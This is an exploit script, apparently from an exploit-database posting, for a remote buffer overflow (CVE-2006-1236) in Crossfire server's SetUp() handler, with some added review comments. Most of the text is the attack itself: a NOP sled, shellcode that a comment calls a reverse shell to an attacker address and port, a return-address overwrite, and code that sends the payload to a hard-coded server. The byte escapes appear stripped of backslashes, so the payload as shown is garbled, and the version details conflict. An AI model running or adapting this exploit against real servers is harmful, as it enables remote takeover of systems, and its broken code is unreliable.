Authored by Khaled Salem

Crossfire Server version 1.0 SetUp() remote buffer overflow exploit.

advisories | CVE-2006-1236

# Exploit Title: crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow
# Exploit Author: Khaled Salem @Khaled0x07
# Software Link: https://www.exploit-db.com/apps/43240af83a4414d2dcc19fff3af31a63-crossfire-1.9.0.tar.gz
# Version: 1.9.0
# Tested on: Kali Linux 2020.4
# CVE : CVE-2006-1236

#!/bin/python
import socket
import time


# Crash at 4379
# EIP Offset at 4368
# Badchar x00x20
# ECX Size 170
# CALL ECX 0x080640eb

# Request that triggers CVE-2006-1236: a `setup` command whose option value
# is long enough to overrun a fixed-size buffer in the server's SetUp()
# handler.  `size` is the total length of that crafted value.
# NOTE(review): `size` is assigned but never read below; the same lengths are
# repeated as literals in the `filler` / `padding` lines.
size = 4379

# Attacker IP: 127.0.0.1 Port: 443
# Opaque machine-code stage supplied by the author; nothing here decodes or
# validates it.  NOTE(review): as shown on this page the escape sequences are
# not valid byte escapes, so these literals are plain text rather than the
# bytes the comments describe.
shellcode = b""
shellcode += b"xd9xeexd9x74x24xf4xb8x60x61x5fx28"
shellcode += b"x5bx33xc9xb1x12x31x43x17x03x43x17"
shellcode += b"x83xa3x65xbdxddx12xbdxb6xfdx07x02"
shellcode += b"x6ax68xa5x0dx6dxdcxcfxc0xeex8ex56"
shellcode += b"x6bxd1x7dxe8xc2x57x87x80xabxa7x77"
shellcode += b"x51x3cxaax77x50x07x23x96xe2x11x64"
shellcode += b"x08x51x6dx87x23xb4x5cx08x61x5ex31"
shellcode += b"x26xf5xf6xa5x17xd6x64x5fxe1xcbx3a"
shellcode += b"xccx78xeax0axf9xb7x6d"




try:
# Layout of the 4368 bytes that precede the saved return address:
# a long NOP run, the stage, then a NOP pad so the stage sits inside the
# 170-byte window the "ECX Size" comment above refers to.
filler = "x90"*(4368 - 170) + shellcode+"x90"*(170-len(shellcode))
# Bytes written over the saved return address: the "CALL ECX 0x080640eb"
# address from the header, byte-reversed (little-endian).  This is the step
# that turns the overrun from a crash into code execution; host-level
# mitigations (non-executable stack, ASLR) reduce it, the server-side fix is
# bounding the length of the option value in SetUp() — presumably what the
# vendor patch for CVE-2006-1236 does; confirm against it.
EIP = "xebx40x06x08"
# Filler up to the measured crash length of 4379.
padding = "C" * (4379 - len(filler) - len(EIP))
payload = filler + EIP + padding
# The wire request: the `setup` command with option `sound` whose value is
# the ~4379-byte payload.  For detection, an oversized argument to `setup`
# on the server port is the distinguishing feature; legitimate option values
# are presumably short tokens — confirm against the protocol documentation.
inputBuffer = "x11(setup sound "+ payload +"x90x00#"
print("Sending Buffer with size:" + str(len(payload)))
s = socket.socket(socket.AF_INET , socket.SOCK_STREAM)
# Target host and port are hard-coded; 13327 is the port the author's test
# server was reached on.
s.connect(("192.168.1.4",13327)) # Server IP Address: 192.168.1.4
# Print whatever the server sends first, before the request goes out.
print(s.recv(1024))

s.send(inputBuffer)
s.close()

# Bare except: any exception raised anywhere in the try body — including
# while assembling `filler`/`payload` above, not only from connect() — is
# reported as a connection failure, and the script then exits with status 0
# even though this is the failure path.
except:
print("Could not connect")
exit(0)